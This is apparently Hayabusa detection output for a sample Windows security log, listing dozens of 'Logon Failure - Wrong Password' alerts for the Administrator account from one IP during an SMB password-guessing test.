2016-09-20 01:51:49.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HrbzGNYIbjErVtDR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eFcGaL3asLVIF08d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dhJvIM5PzA9U6GTD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KYrfD15TPp8OuST4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8d4CbZSTHhl7fRfa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IItrtl1h3PsKviaQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WVeoptuwLNKlm0V2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Rf6Ri9Lm81mScRt4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NPVkTRUILL5czcbF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QZJq3kjykwzh0hVh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lHL4KuirjQ96Dgfw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DSPjDklMHdW6LqK5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EL0oMweyFgI0MEdM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NJS2dZhWmCGF1Qos  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bNR5dXXnx0LeyNmW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ApUMxqDiqDNo6hrF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o3d1caGukhhBHp6s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oxDVCaWpkSECRoml  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: coqijUGaaVJXY4GV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7ATPa6qMbfQ9QDrW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mnQEE00r01jhCNzr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ir9sY7kG6vbOad4z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: REuk1RZ5eRs3pSbT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 91gfIcAUvKrSAENh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MtrVV1ux0v5w5XWZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rFpyAqPQP77Ls6ir  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nvwp4DimL7SgBmb0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u1lnJZDjghQNQxfG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pBN1g8NBIj6WMrhz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cJMUobtFTwOQTgqd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QGZeGqe9rC172BVa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zNP99dMvvDQl8WVw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qcwp0odjR0LfM11y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6VjaFCzZr8iUUovn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C3YniJHC0Cswfti0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 63lZpExTzSzNR96C  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fKI61MTXJ5x9WF56  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NhWYNEPWgh03cQSJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pvZg2LTYtsUhvBhr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BENGUFtNxdPjaS03  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fY1s0OG9JR38H6rm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LblLG1Il6ngkuAOo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PAZ83Onp00vURKSz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BxvywmA4UMI04zm2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1vH6DSer71gxEDRc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uDNQibannB453BKc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 02qkYtCIrOj38agd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: atDwGfxC4RLYYDAF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fCTUmKwLxkKCoCTn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DBE7Y8yJMNSkJlaK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: N7VGVfH05BC7bgaZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lP7kC2ayRIEeL5sw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2cQOn41cB2t0ZkSP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PpOyXZwlcCw63tWP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7R8yD7A0lCU16Z0t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: frasd7f8On0O7B6k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FtOqqV6rkCIZPPFG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lnwn4dc1lKABRKxH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CiUnLFzfXR6rER9B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u1InESrL0ebaRw2z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IlLAG8gXt9YNeW4H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uZIWubLvZcDOWHxr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FZazp7ZnBrtswAse  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jqK5Vqf0QF4qtg0A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k3JvFwi9gDNbO6Sj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fBubAOTZMsahNG0Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KCxrXG3N1IRzDxxM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e2h9M7o0lS7oC00a  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pprfGGVZblL64xC3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wxgzMKd7eDwzs8WO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: q2RljqAhn0NZhR6O  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rcxQVtjMqnE1wGfr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fSRggYsSiJGsGSyV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
